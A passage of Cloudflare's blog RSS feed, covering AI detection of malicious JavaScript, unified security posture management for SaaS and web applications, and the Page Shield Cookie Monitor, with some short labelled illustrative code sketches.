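    <p>A minimal sketch of tree-based cache keys, assuming Node.js and a hand-written tree shape, could look like this. The node type names, the <code>canonicalize</code>, <code>treeCacheKey</code>, and <code>cachedScore</code> helpers, and the stand-in model are hypothetical; the idea taken from the text is only that comments and empty statements are dropped before hashing, so that cosmetic differences map to the same key.</p>

```javascript
const { createHash } = require("node:crypto");

// Hypothetical node types that carry no meaning for execution.
const IGNORED_TYPES = new Set(["comment", "empty_statement"]);

// Reduce a tree to a canonical nested array, dropping ignored nodes.
function canonicalize(node) {
  const children = (node.children ?? [])
    .filter((child) => !IGNORED_TYPES.has(child.type))
    .map(canonicalize);
  return [node.type, node.text ?? null, children];
}

// SHA-256 over the canonical form instead of over the raw script text.
function treeCacheKey(root) {
  return createHash("sha256")
    .update(JSON.stringify(canonicalize(root)))
    .digest("hex");
}

// Score cache: the model runs only for trees that were never seen before.
const scoreCache = new Map();
function cachedScore(root, runModel) {
  const key = treeCacheKey(root);
  if (!scoreCache.has(key)) scoreCache.set(key, runModel(root));
  return scoreCache.get(key);
}

// Two versions of the same program; the second adds a comment and a stray ";".
const plainTree = {
  type: "program",
  children: [{ type: "identifier", text: "x" }],
};
const noisyTree = {
  type: "program",
  children: [
    { type: "comment", text: "// hello" },
    { type: "identifier", text: "x" },
    { type: "empty_statement" },
  ],
};

let modelCalls = 0;
const fakeModel = () => {
  modelCalls += 1; // stand-in for an expensive GNN inference call
  return 97;
};
const firstScore = cachedScore(plainTree, fakeModel);
const secondScore = cachedScore(noisyTree, fakeModel);
console.log(firstScore, secondScore, modelCalls);
```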
    <div>
      <h3>Let AI help ease PCI DSS v4 compliance</h3>
      <a href="#let-ai-help-ease-pci-dss-v4-compliance">
        
      </a>
    </div>
    <p>One of the most popular use cases for deploying Page Shield is to help meet the two new client-side security requirements in PCI DSS v4 — <a href="https://assets.ctfassets.net/slt3lc6tev37/4HJex2kG7FCb1IJRC9rIhL/081fdd8b1a471def14cfd415f99e4b58/Evaluation_Page_Shield_091124_FINAL.pdf"><u>6.4.3 and 11.6.1</u></a>. These requirements make companies responsible for approving scripts used in payment pages, where payment card data could be compromised by malicious JavaScript. Both of these requirements <a href="https://blog.pcisecuritystandards.org/countdown-to-pci-dss-v4.0"><u>become effective</u></a> on March 31, 2025.</p><p>Page Shield with AI malicious JavaScript detection can be deployed with just a few clicks, especially if your website is already proxied through Cloudflare. <a href="https://www.cloudflare.com/page-shield/"><u>Sign up here</u></a> to fast track your onboarding!</p> ]]></content:encoded>
            <category><![CDATA[Security Week]]></category>
            <category><![CDATA[Page Shield]]></category>
            <category><![CDATA[AI]]></category>
            <category><![CDATA[Machine Learning]]></category>
            <category><![CDATA[Malicious JavaScript]]></category>
            <category><![CDATA[JavaScript]]></category>
            <guid isPermaLink="false">3VQUOQBWzT8cc7oFFv003i</guid>
            <dc:creator>Juan Miguel Cejuela</dc:creator>
            <dc:creator>Zhiyuan Zheng</dc:creator>
        </item>
        <item>
            <title><![CDATA[One platform to manage your company’s predictive security posture with Cloudflare]]></title>
            <link>https://blog.cloudflare.com/cloudflare-security-posture-management/</link>
            <pubDate>Tue, 18 Mar 2025 13:00:00 GMT</pubDate>
            <description><![CDATA[ Cloudflare introduces a single platform for unified security posture management, helping protect SaaS and web applications deployed across various environments.  ]]></description>
            <content:encoded><![CDATA[ <p>In today’s fast-paced digital landscape, companies are managing an increasingly complex mix of environments — from SaaS applications and public cloud platforms to on-prem data centers and hybrid setups. This diverse infrastructure offers flexibility and scalability, but also opens up new attack surfaces.</p><p>To support both business continuity and security needs, “security must evolve from being <a href="https://blog.cloudflare.com/welcome-to-security-week-2025/#how-can-we-help-make-the-internet-better"><u>reactive to predictive</u></a>”. Maintaining a healthy security posture entails monitoring and strengthening your security defenses to identify risks, ensure compliance, and protect against evolving threats. With our newest capabilities, you can now use Cloudflare to achieve a healthy posture across your SaaS and web applications. This addresses any security team’s ultimate (daily) question: <i>How well are our assets and documents protected</i>?</p><p>A predictive security posture relies on the following key components:</p><ul><li><p>Real-time discovery and inventory of all your assets and documents</p></li><li><p>Continuous asset-aware threat detection and risk assessment</p></li><li><p>Prioritised remediation suggestions to increase your protection</p></li></ul><p>Today, we are sharing how we have built these key components across SaaS and web applications, and how you can use them to manage your business’s security posture.</p>
    <div>
      <h3>Your security posture at a glance</h3>
      <a href="#your-security-posture-at-a-glance">
        
      </a>
    </div>
    <p>Regardless of the applications you have <a href="https://developers.cloudflare.com/reference-architecture/architectures/security/#using-cloudflare-to-protect-your-business"><u>connected to</u></a> Cloudflare’s global network, Cloudflare actively scans for risks and misconfigurations associated with each one of them on a <a href="https://developers.cloudflare.com/security-center/security-insights/how-it-works/#scan-frequency"><u>regular cadence</u></a>. Identified risks and misconfigurations are surfaced in the dashboard under <a href="https://dash.cloudflare.com/?to=/:account/security-center"><u>Security Center</u></a> as insights.</p><p>Insights are grouped by their severity, type of risk, and corresponding Cloudflare solution, providing various angles for you to zoom in to what you want to focus on. When applicable, a one-click resolution is provided for selected insight types, such as setting <a href="https://developers.cloudflare.com/ssl/edge-certificates/additional-options/minimum-tls/"><u>minimum TLS version</u></a> to 1.2, which is <a href="https://developers.cloudflare.com/ssl/reference/protocols/#decide-which-version-to-use"><u>recommended by PCI DSS</u></a>. This simplicity is highly appreciated by customers that are managing a growing set of assets being deployed across the organization.</p><p>To help shorten the time to resolution even further, we have recently added <a href="https://www.cloudflare.com/learning/access-management/role-based-access-control-rbac/"><u>role-based access control (RBAC)</u></a> to <a href="https://developers.cloudflare.com/security-center/security-insights/"><u>Security Insights</u></a> in the Cloudflare dashboard. Individual security practitioners now have access to a distilled view of the insights that are relevant for their role. 
A user with an <a href="https://developers.cloudflare.com/fundamentals/setup/manage-members/roles/"><u>administrator role</u></a> (a CSO, for example) has access to, and visibility into, all insights.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/bnaU55Fi2z9bxUxl5pf7o/818043fbba2ae13c5a7c4cb25e5e7ebc/1.png" />
          </figure><p>In addition to account-wide Security Insights, we also provide posture overviews that are closer to the corresponding security configurations of your SaaS and web applications. Let’s dive into each of them.</p>
    <div>
      <h3>Securing your SaaS applications</h3>
      <a href="#securing-your-saas-applications">
        
      </a>
    </div>
    <p>Without centralized posture management, SaaS applications can feel like the security wild west. They contain a wealth of sensitive information (files, databases, workspaces, designs, invoices, or anything else your company needs to operate), but control is limited to the vendor’s settings, leaving you with less visibility and fewer customization options. Moreover, team members are constantly creating, updating, and deleting content that can cause configuration drift and data exposure, such as sharing files publicly, adding PII to non-compliant databases, or giving access to third-party integrations. With Cloudflare, you have visibility across your SaaS application fleet in one dashboard.</p>
    <div>
      <h4>Posture findings across your SaaS fleet</h4>
      <a href="#posture-findings-across-your-saas-fleet">
        
      </a>
    </div>
    <p>From the account-wide Security Insights, you can review insights for potential SaaS security issues:</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7JRKfYveWKayrMxdLxLvDB/1c3383209462917214ad9dc6584e98fe/2.png" />
          </figure><p>You can choose to dig further with <a href="https://developers.cloudflare.com/cloudflare-one/applications/casb/"><u>Cloud Access Security Broker (CASB)</u></a> for a thorough review of the misconfigurations, risks, and failures to meet best practices across your SaaS fleet. You can identify a wealth of security information including, but not limited to:</p><ul><li><p>Publicly available or externally shared files</p></li><li><p>Third-party applications with read or edit access</p></li><li><p>Unknown or anonymous user access</p></li><li><p>Databases with exposed credentials</p></li><li><p>Users without two-factor authentication</p></li><li><p>Inactive user accounts</p></li></ul><p>You can also explore the <i>Posture Findings </i>page, which provides easy searching and navigation across documents that are stored within the SaaS applications.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/6skScbapgiG31w5qRoTCjG/ba3b069de8cce0c0bfcb9f011a2df954/3.png" />
          </figure><p>Additionally, you can create policies to prevent configuration drift in your environment. Prevention-based policies help maintain a secure configuration and compliance standards while reducing alert fatigue for Security Operations teams. They can also prevent the inappropriate movement or exfiltration of sensitive data. Unifying controls and visibility across environments makes it easier to lock down regulated data classes, maintain detailed audit trails via logs, and improve your security posture to reduce the risk of breaches.</p>
    <div>
      <h4>How it works: new, real-time SaaS documents discovery</h4>
      <a href="#how-it-works-new-real-time-saas-documents-discovery">
        
      </a>
    </div>
    <p>Delivering SaaS security posture information to our customers requires collecting vast amounts of data from a wide range of platforms. To ensure that all the documents living in your SaaS apps (files, designs, etc.) are secure, we need to collect information about their configuration: are they publicly shared, do third-party apps have access, is <a href="https://www.cloudflare.com/learning/access-management/what-is-multi-factor-authentication/"><u>multi-factor authentication (MFA)</u></a> enabled?</p><p>We previously did this with crawlers, which would pull data from the SaaS APIs. However, we were plagued with rate limits from the SaaS vendors when working with larger datasets. This forced us to work in batches and ramp scanning up and down as the vendors permitted. The result was stale findings that made remediation cumbersome and unclear. For example, Cloudflare could keep reporting a file as publicly shared for a short period after the permissions were removed, which confused customers.</p><p>To fix this, we upgraded our data collection pipeline to be dynamic and real-time, reacting to changes in your environment as they occur, whether it’s a new security finding, an updated asset, or a critical alert from a vendor. We started with our Microsoft asset discovery and <a href="https://developers.cloudflare.com/cloudflare-one/applications/casb/casb-integrations/microsoft-365/"><u>posture findings</u></a>, providing you real-time insight into your Microsoft Admin Center, OneDrive, Outlook, and SharePoint configurations. We will be rapidly expanding support to additional SaaS vendors going forward.</p>
    <div>
      <h5>Listening for update events from Cloudflare Workers</h5>
      <a href="#listening-for-update-events-from-cloudflare-workers">
        
      </a>
    </div>
    <p>Cloudflare Workers serve as the entry point for vendor webhooks, handling asset change notifications from external services. The workflow unfolds as follows:</p><ul><li><p><b>Webhook listener:</b> An initial Worker acts as the webhook listener, receiving asset change messages from vendors.</p></li><li><p><b>Data storage &amp; queuing:</b> Upon receiving a message, the Worker uploads the raw payload of the change notification to Cloudflare R2 for persistence, and publishes it to a Cloudflare Queue dedicated to raw asset changes.</p></li><li><p><b>Transformation Worker:</b> A second Worker, bound as a consumer to the raw asset change queue, processes the incoming messages. This Worker transforms the raw vendor-specific data into a generic format suitable for CASB. The transformed data is then:</p><ul><li><p>Stored in Cloudflare R2 for future reference.</p></li><li><p>Published on another Cloudflare Queue, designated for transformed messages.</p></li></ul></li></ul>
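    <p>The flow above can be sketched in a few lines. This is only an illustration, not Cloudflare's implementation: a dictionary stands in for the R2 bucket, two in-memory deques stand in for the Queues, and the payload field names (<code>resource</code>, <code>changeType</code>) are assumptions made for the example.</p>

```python
import itertools
import json
from collections import deque

# In-memory stand-ins (assumptions) for an R2 bucket and two Queues.
object_store = {}
raw_queue = deque()
transformed_queue = deque()
_ids = itertools.count()


def webhook_listener(vendor, body):
    """First Worker: persist the raw payload, then enqueue it."""
    key = f"raw/{vendor}/{next(_ids)}"
    object_store[key] = body
    raw_queue.append({"vendor": vendor, "key": key, "body": body})
    return key


def transform_worker():
    """Second Worker: consume raw messages and emit a generic format."""
    processed = 0
    while raw_queue:
        message = raw_queue.popleft()
        payload = json.loads(message["body"])
        generic = {
            "vendor": message["vendor"],
            "asset_id": payload["resource"],  # assumed field name
            "change": payload["changeType"],  # assumed field name
        }
        # Keep a copy of the transformed message for future reference.
        stored_key = message["key"].replace("raw/", "transformed/", 1)
        object_store[stored_key] = json.dumps(generic)
        transformed_queue.append(generic)
        processed += 1
    return processed
```

    <p>Storing the payload before queuing it means a message can be replayed from storage if a later stage fails, which is one plausible reason for persisting at both steps.</p>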
    <div>
      <h5>CASB Processing: Consumers &amp; Crawlers</h5>
      <a href="#casb-processing-consumers-crawlers">
        
      </a>
    </div>
    <p>Once the transformed messages reach the CASB layer, they undergo further processing:</p><ul><li><p><b>Polling consumer:</b> CASB has a consumer that polls the transformed message queue. Upon receiving a message, it determines the relevant handler required for processing.</p></li><li><p><b>Crawler execution:</b> The handler then maps the message to an appropriate crawler, which interacts with the vendor API to fetch the most up-to-date asset details.</p></li><li><p><b>Data storage:</b> The retrieved asset data is stored in the CASB database, ensuring it is accessible for security and compliance checks.</p></li></ul><p>With this improvement, we are now processing 10 to 20 Microsoft updates per second, or 864,000 to roughly 1.73 million updates daily (86,400 seconds per day), giving customers fast visibility into their environment. Look out for expansion to other SaaS vendors in the coming months.</p>
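    <p>The consumer, handler, and crawler steps amount to a dispatch table. The sketch below assumes a hypothetical message shape (<code>asset_type</code>, <code>asset_id</code>) and uses placeholder crawler functions in place of real vendor API calls; none of these names come from CASB itself.</p>

```python
from collections import deque

# Stand-in (assumption) for the CASB database.
casb_database = {}


def crawl_file(asset_id):
    # Placeholder for a vendor API call that fetches fresh file details.
    return {"asset_id": asset_id, "kind": "file", "public": False}


def crawl_user(asset_id):
    # Placeholder for a vendor API call that fetches fresh user details.
    return {"asset_id": asset_id, "kind": "user", "mfa_enabled": True}


# Handler table: maps an asset type to the crawler that refreshes it.
CRAWLERS = {"file": crawl_file, "user": crawl_user}


def poll_once(queue):
    """Drain the queue, dispatch each message, and return skipped messages."""
    skipped = []
    while queue:
        message = queue.popleft()
        crawler = CRAWLERS.get(message["asset_type"])
        if crawler is None:
            skipped.append(message)  # no handler registered for this type
            continue
        casb_database[message["asset_id"]] = crawler(message["asset_id"])
    return skipped
```

    <p>Because the crawler fetches the current state rather than trusting the notification body, a late or duplicated message still leaves the database holding the latest asset details.</p>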
    <div>
      <h3>Securing your web applications</h3>
      <a href="#securing-your-web-applications">
        
      </a>
    </div>
    <p>A unique challenge of securing web applications is that no one size fits all. Asset-aware posture management bridges the gap between a universal security solution and unique business needs, offering tailored recommendations for security teams to protect what matters.</p>
    <div>
      <h4>Posture overview from attacks to threats and risks</h4>
      <a href="#posture-overview-from-attacks-to-threats-and-risks">
        
      </a>
    </div>
    <p>Starting today, all Cloudflare customers have access to Security Overview, a new landing page customized for each of your onboarded domains. This page aggregates and prioritizes security suggestions across all your web applications:</p><ol><li><p>Any (ongoing) attacks detected that require immediate attention</p></li><li><p>Disposition (mitigated, served by Cloudflare, served by origin) of all proxied traffic over the last 7 days</p></li><li><p>Summary of currently active security modules that are detecting threats</p></li><li><p>Suggestions of how to improve your security posture with a step-by-step guide</p></li><li><p>A glimpse of your most active and most recently updated security rules</p></li></ol>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/3YhmhUZbZbAIZryUuTodpV/2b9563ac7768348bb4be46abc5fef7b3/4.png" />
          </figure><p>These tailored security suggestions are surfaced based on your traffic profile and business needs, which is made possible by discovering your proxied web assets.</p>
    <div>
      <h4>Discovery of web assets</h4>
      <a href="#discovery-of-web-assets">
        
      </a>
    </div>
    <p>Many web applications, regardless of their industry or use case, require similar functionality: user identification, accepting payment information, etc. By discovering the assets serving this functionality, we can build and run targeted threat detection to protect them in depth.</p><p>As an example, bot traffic towards marketing pages and bot traffic towards login pages have different business impacts. Content scraping may target your marketing materials, which you may or may not want to allow, while credential stuffing on your login page deserves immediate attention.</p><p>Web assets are described by a list of endpoints, and labelling each endpoint defines its business goal. A simple example is <code>POST</code> requests to path <code>/portal/login</code>, which likely describe an API for user authentication, while <code>GET</code> requests to path <code>/portal/login</code> denote the actual login webpage.</p><p>Labels describe the business goals of endpoints. <code>POST</code> requests to the <code>/portal/login</code> endpoint serving end users and to the <code>/api/admin/login</code> endpoint used by employees can both be labelled using the same <code>cf-log-in</code> <a href="https://developers.cloudflare.com/api-shield/management-and-monitoring/endpoint-labels/#managed-labels"><u>managed label</u></a>, letting Cloudflare know that usernames and passwords are expected to be sent to these endpoints.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7jFh9mc7hyryXHIqeQwS9U/25ba022282b43cff9f09700d0ae81c76/5.png" />
          </figure><p>API Shield customers can already make use of <a href="https://developers.cloudflare.com/api-shield/management-and-monitoring/endpoint-labels/"><u>endpoint labelling</u></a>. In early Q2 2025, we are adding label discovery and suggestion capabilities, starting with three labels, <code>cf-log-in</code>, <code>cf-sign-up</code>, and <code>cf-rss-feed</code>. All other customers can manually add these labels to the <a href="https://developers.cloudflare.com/api-shield/management-and-monitoring/"><u>saved endpoints</u></a>. One use of these labels, explained below, is preventing disposable emails from being used during sign-ups.</p>
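    <p>The labelling model described in this section can be pictured as a mapping from (method, path) pairs to sets of labels. The following is a minimal sketch of that idea using the example endpoints from the text; the data structure and helper names are assumptions for illustration and do not reflect how API Shield stores labels.</p>

```python
# Each endpoint is a (method, path) pair; labels describe its business goal.
endpoint_labels = {
    ("POST", "/portal/login"): {"cf-log-in"},
    ("POST", "/api/admin/login"): {"cf-log-in"},
    ("GET", "/portal/login"): set(),  # the login web page, unlabelled here
}


def labels_for(method, path):
    """Return the labels attached to an endpoint (empty set if unknown)."""
    return endpoint_labels.get((method.upper(), path), set())


def endpoints_with(label):
    """Return every endpoint carrying the given label, in sorted order."""
    return sorted(ep for ep, labels in endpoint_labels.items() if label in labels)
```

    <p>Keying on the method as well as the path is what lets the <code>POST</code> authentication API and the <code>GET</code> login page be treated differently even though they share a path.</p>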
    <div>
      <h4>Always-on threat detection and risk assessment</h4>
      <a href="#always-on-threat-detection-and-risk-assessment">
        
      </a>
    </div>
    
    <div>
      <h5>Use-case driven threat detection</h5>
      <a href="#use-case-driven-threat-detection">
        
      </a>
    </div>
    <p>Customers told us that, with the growing excitement around generative AI, they need support to secure this new technology while not hindering innovation. Being able to discover LLM-powered services allows fine-tuning security controls that are relevant for this particular technology, such as inspecting prompts, limiting prompting rates based on token usage, etc. In a separate Security Week blog post, we will share how we build Cloudflare Firewall for AI, and how you can easily protect your generative AI workloads.</p><p>Account fraud detection, which encompasses multiple attack vectors, is another key area that we are focusing on in 2025.</p><p>On many login and signup pages, a <a href="https://www.cloudflare.com/learning/bots/how-captchas-work/"><u>CAPTCHA</u></a> solution is commonly used to only allow human beings through, assuming only bots perform undesirable actions. Setting aside that most visual CAPTCHA puzzles can be easily <a href="https://arstechnica.com/ai/2024/09/ai-defeats-traffic-image-captcha-in-another-triumph-of-machine-over-man/"><u>solved by AI</u></a> nowadays, such an approach cannot effectively address the <i>root cause</i> of most account fraud vectors. For example, human beings can use disposable emails to sign up for single-use accounts and take advantage of signup promotions.</p><p>To solve this fraudulent sign-up issue, a security rule currently under development could be deployed as below to block all attempts that use disposable emails as a user identifier, regardless of whether the requester was automated or not. All existing or future <code>cf-log-in</code> and <code>cf-sign-up</code> labelled endpoints are protected by this single rule, as they both require user identification.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/7sJzdnjp9UWrp35Hd3SsGB/db0959b457c555a4a1e93e5515a1e61f/6.png" />
          </figure><p>Our fast-expanding, use-case driven threat detections all run by default, from the moment you onboard your traffic to Cloudflare. The detection results are available immediately and can be reviewed through security analytics, helping you make swift, informed decisions.</p>
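    <p>The logic of the disposable-email rule described above can be approximated as follows. Since the rule is still under development, this is a rough sketch under stated assumptions rather than the actual rule: the domain list is hypothetical, and the function only checks the email domain against that list for endpoints carrying one of the two labels.</p>

```python
# Hypothetical list of disposable email domains, for illustration only.
DISPOSABLE_DOMAINS = {"mailinator.example", "tempmail.example"}
PROTECTED_LABELS = {"cf-log-in", "cf-sign-up"}


def should_block(endpoint_labels, email):
    """Block when a labelled endpoint receives a disposable email address."""
    if not PROTECTED_LABELS.intersection(endpoint_labels):
        return False  # the endpoint does not require user identification
    domain = email.rpartition("@")[2].strip().lower()
    return domain in DISPOSABLE_DOMAINS
```

    <p>Note that the check never asks whether the requester is a bot, which mirrors the point made above: the decision depends on the identifier being used, not on who or what submitted it.</p>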
    <div>
      <h5>API endpoint risk assessment</h5>
      <a href="#api-endpoint-risk-assessment">
        
      </a>
    </div>
    <p>APIs have their own set of risks and vulnerabilities, and today Cloudflare is delivering seven new risk scans through API Posture Management. This new capability of API Shield helps reduce risk by identifying security issues and fixing them early, before APIs are attacked. Because APIs are typically made up of many different backend services, security teams need to pinpoint which backend service is vulnerable so that development teams may remediate the identified issues.</p><p>Our new API posture management risk scans do exactly that: users can quickly identify which API endpoints are at risk from a number of vulnerabilities, including sensitive data exposure, authentication status, <a href="https://owasp.org/API-Security/editions/2023/en/0xa1-broken-object-level-authorization/"><u>Broken Object Level Authorization (BOLA)</u></a> attacks, and more.</p><p>Authentication Posture is one risk scan you’ll see in the new system. We focused on it to start with because sensitive data is at risk when API authentication is assumed to be enforced but is actually broken. <a href="https://developers.cloudflare.com/api-shield/security/authentication-posture/"><u>Authentication Posture</u></a> helps customers identify authentication misconfigurations for APIs and alerts them to their presence. This is achieved by scanning for successful requests against the API and noting their authentication status. API Shield scans traffic daily and labels API endpoints that have missing and mixed authentication for further review.</p><p>If you have configured session IDs in API Shield, you can find the new risk scan labels and authentication details per endpoint in API Shield. Security teams can take this detail to their development teams to fix the broken authentication.</p>
          <figure>
          <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/21jVSrwsgfjKlyxyOZ5Qye/7963d95ea28a41f5e2b4f331ab5d5060/7.png" />
          </figure><p>We’re launching today with <a href="https://developers.cloudflare.com/api-shield/management-and-monitoring/endpoint-labels/"><u>scans</u></a> for authentication posture, sensitive data, underprotected APIs, BOLA attacks, and anomaly scanning for API performance across errors, latency, and response size.</p>
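    <p>The Authentication Posture scan described above (look at successful requests, note whether each carried authentication, then flag endpoints with missing or mixed authentication) can be sketched like this. It is a simplified illustration: treating 2xx responses as "successful" is an assumption, and the result strings are made up for the example rather than being API Shield's label names.</p>

```python
from collections import defaultdict


def authentication_posture(requests):
    """Classify endpoints from successful requests and their auth status.

    `requests` is an iterable of (endpoint, status_code, authenticated).
    """
    seen = defaultdict(set)
    for endpoint, status_code, authenticated in requests:
        if status_code // 100 == 2:  # assumption: only 2xx counts as success
            seen[endpoint].add(bool(authenticated))

    posture = {}
    for endpoint, states in seen.items():
        if states == {True}:
            posture[endpoint] = "authenticated"
        elif states == {False}:
            posture[endpoint] = "missing-auth"  # illustrative label
        else:
            posture[endpoint] = "mixed-auth"  # illustrative label
    return posture
```

    <p>Only successful responses are counted because an unauthenticated request that is rejected shows authentication working; the risk is an unauthenticated request that succeeds.</p>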
    <div>
      <h3>Simplify maintaining a good security posture with Cloudflare</h3>
      <a href="#simplify-maintaining-a-good-security-posture-with-cloudflare">
        
      </a>
    </div>
    <p>Achieving a good security posture in a fast-moving environment requires innovative solutions that can transform complexity into simplicity. Bringing together the ability to continuously assess threats and risks across both public and private IT environments through a single platform is our first step in supporting our customers’ efforts to maintain a healthy security posture.</p><p>To further enhance the relevance of security insights and suggestions provided and help you better prioritize your actions, we are looking into integrating Cloudflare’s global view of threat landscapes. With this, you gain additional perspectives, such as what the biggest threats to your industry are, and what attackers are targeting at the current moment. Stay tuned for more updates later this year.</p><p>If you haven’t done so yet, <a href="https://dash.cloudflare.com/?to=/:account/security-center"><u>onboard your SaaS and web applications</u></a> to Cloudflare today to gain instant insights into how to improve your business’s security posture.</p> ]]></content:encoded>
            <category><![CDATA[Security Week]]></category>
            <category><![CDATA[Security Posture Management]]></category>
            <category><![CDATA[Security]]></category>
            <category><![CDATA[Security Center]]></category>
            <category><![CDATA[SAAS Security]]></category>
            <category><![CDATA[Application Security]]></category>
            <category><![CDATA[API Security]]></category>
            <category><![CDATA[Email Security]]></category>
            <guid isPermaLink="false">41Rkgr3IVvWI5n1DpmMDkJ</guid>
            <dc:creator>Zhiyuan Zheng</dc:creator>
            <dc:creator>Noelle Kagan</dc:creator>
            <dc:creator>John Cosgrove</dc:creator>
            <dc:creator>Frank Meszaros</dc:creator>
            <dc:creator>Yugesha Sapte</dc:creator>
        </item>
        <item>
            <title><![CDATA[Collect all your cookies in one jar with Page Shield Cookie Monitor]]></title>
            <link>https://blog.cloudflare.com/collect-all-your-cookies-in-one-jar/</link>
            <pubDate>Thu, 07 Mar 2024 14:00:09 GMT</pubDate>
            <description><![CDATA[ Protecting online privacy starts with knowing what cookies are used by your websites. Page Shield extends transparent monitoring to HTTP cookies, empowering security and compliance teams with an easy overview without the need for an external scanner or changes to existing web applications ]]></description>
            <content:encoded><![CDATA[ <p></p><p><a href="https://www.cloudflare.com/learning/privacy/what-are-cookies/">Cookies</a> are small files of information that a web server generates and sends to a web browser. For example, a cookie stored in your browser will let a website know that you are already logged in, so instead of showing you a login page, you would be taken to your account page welcoming you back.</p><p>Though cookies are very useful, they are also used for tracking and advertising, sometimes with repercussions for user privacy. Cookies are a core tool, for example, for all advertising networks. To protect users, privacy laws may require website owners to clearly specify what cookies are being used and for what purposes, and, in many cases, to obtain a user's consent before storing those cookies in the user's browser. A key example of this is the <a href="https://gdpr.eu/cookies/#:~:text=Cookie%20compliance,cookies%20except%20strictly%20necessary%20cookies.">ePrivacy Directive</a>.</p><p>Herein lies the problem: often website administrators, developers, or compliance team members don’t know what cookies are being used by their website. A common approach for gaining a better understanding of cookie usage is to set up a scanner bot that crawls through each page, collecting cookies along the way. However, many websites requiring authentication or additional security measures do not allow for these scans, or require custom security settings to allow the scanner bot access.</p><p>To address these issues, we developed Page Shield Cookie Monitor, which provides a single dashboard view of all first-party cookies being used by your websites. Over the next few weeks, we are rolling out Page Shield Cookie Monitor to all paid plans. If Page Shield is enabled, no configuration or scanners are required.</p>
    <div>
      <h3>HTTP cookies</h3>
      <a href="#http-cookies">
        
      </a>
    </div>
    <p><a href="https://en.wikipedia.org/wiki/HTTP_cookie">HTTP cookies</a> are designed to allow persistence for the stateless HTTP protocol. A basic example of cookie usage is to identify a logged-in user. The browser submits the cookie back to the website whenever you access it again, letting the website know who you are and providing you a customized experience. Cookies are implemented as <a href="https://en.wikipedia.org/wiki/List_of_HTTP_header_fields">HTTP headers</a>.</p><p>Cookies can be classified as first-party or third-party.</p><p>First-party cookies are normally set by the website owner<sup>1</sup>, and are used to track state against the given website. The logged-in example above falls into this category. First-party cookies are normally restricted and sent to the given website only, and won’t be visible to other sites.</p><p>Third-party cookies, on the other hand, are often set by large advertising networks, social networks, or other large organizations that want to track user journeys across the web (across domains). For example, some websites load advertisement objects from a different domain that may set a third-party cookie associated with that advertising network.</p>
    <div>
      <h3>Cookies are used for tracking</h3>
      <a href="#cookies-are-used-for-tracking">
        
      </a>
    </div>
    <p>Growing concerns around user privacy have led browsers to start blocking third-party cookies by default. <a href="https://blog.mozilla.org/en/products/firefox/todays-firefox-blocks-third-party-tracking-cookies-and-cryptomining-by-default/">Firefox</a> and <a href="https://www.theverge.com/2020/3/24/21192830/apple-safari-intelligent-tracking-privacy-full-third-party-cookie-blocking">Safari</a> led the way a few years back. <a href="https://developers.google.com/privacy-sandbox/blog/cookie-countdown-2024jan">Google Chrome</a>, which currently has the <a href="https://radar.cloudflare.com/reports/browser-market-share-2023-q4">largest browser market share</a>, and whose parent company owns Google Ads, the <a href="https://w3techs.com/technologies/overview/advertising">dominant advertising network</a>, started restricting third-party cookies in January of this year.</p><p>However, this does not mean the end of tracking users for advertising purposes; the technology has advanced, allowing tracking to continue based on first-party cookies. Facebook Pixel, for example, started offering to set first-party cookies <i>alongside</i> third-party cookies <a href="https://www.inc.com/peter-roesler/facebook-to-allow-for-first-party-cookies-on-october-24th.html">in 2018</a> when embedded in a website, in order “<a href="https://www.facebook.com/business/help/471978536642445?id=1205376682832142">to be more accurate in measurement and reporting</a>”.</p>
    <div>
      <h3>Scanning for cookies?</h3>
      <a href="#scanning-for-cookies">
        
      </a>
    </div>
    <p>To inventory all the cookies used when your website is accessed, you can open up any modern browser’s developer console and review which cookie is being set and sent back per HTTP request. However, collecting cookies with this approach won’t be practical unless your website is rather static, containing few external <a href="https://en.wikipedia.org/wiki/Snippet_(programming)">snippets</a>.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/66MMjxkmwS1B9Ehtk8WPbN/2f29fa1bffaa14d0d574ed50e3a7078b/image1-22.png" />
            
            </figure><p><i>Screen capture of Chrome’s developer console listing cookies being set and sent back when visiting a website.</i></p><p>To resolve this, a cookie scanner can be used to automate cookie collection. Depending on your security setup, additional configurations are sometimes required in order to let the scanner bots pass through protection and/or authentication. This may open up a <a href="https://www.cloudflare.com/learning/security/what-is-an-attack-surface/">potential attack surface</a>, which isn’t ideal.</p>
    <div>
      <h3>Introducing Page Shield Cookie Monitor</h3>
      <a href="#introducing-page-shield-cookie-monitor">
        
      </a>
    </div>
    <p>With Page Shield <a href="https://developers.cloudflare.com/page-shield/get-started/#activate-page-shield">enabled</a>, all the first-party cookies, whether set by your website or by external snippets, are collected and displayed in one place, no scanner required. With the click of a button, the full list can be exported in CSV format for further inventory processing.</p><p>If you run multiple websites like a marketing website and an admin console that require different cookie strategies, you can simply filter the list based on either domain or path, under the same view. This includes the websites that require authentication such as the admin console.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/33L4FEvcR5LPp8YwkIfdxF/fcf093584fc5527286bce47470aac9cc/image3-19.png" />
            
            </figure><p><i>Dashboard showing a table of cookies seen, including key details such as cookie name, domain and path, and which host set the cookie.</i></p><p>To examine a particular cookie, clicking on its name takes you to a dedicated page that includes all the cookie attributes. Furthermore, similar to Script Monitor and Connection Monitor, we collect the first seen and last seen time and pages for easier tracking of your website’s behavior.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/33eImaar9FKMDZVmt3f4s1/56f60b1478ae44dc0fcfb018367f2098/image4-22.png" />
            
            </figure><p><i>Detailed view of a captured cookie in the dashboard, including all cookie attributes as well as under which host and path this cookie has been set.</i></p><p>Last but not least, we are adding one more alert type specifically for newly seen cookies. When you subscribe to this alert, we will notify you through either email or <a href="https://developers.cloudflare.com/notifications/get-started/configure-webhooks/">webhook</a> as soon as a new cookie is detected, including all the details mentioned above. This allows you to trigger any workflow required, such as inventorying this new cookie for compliance.</p>
    <div>
      <h3>How Cookie Monitor works</h3>
      <a href="#how-cookie-monitor-works">
        
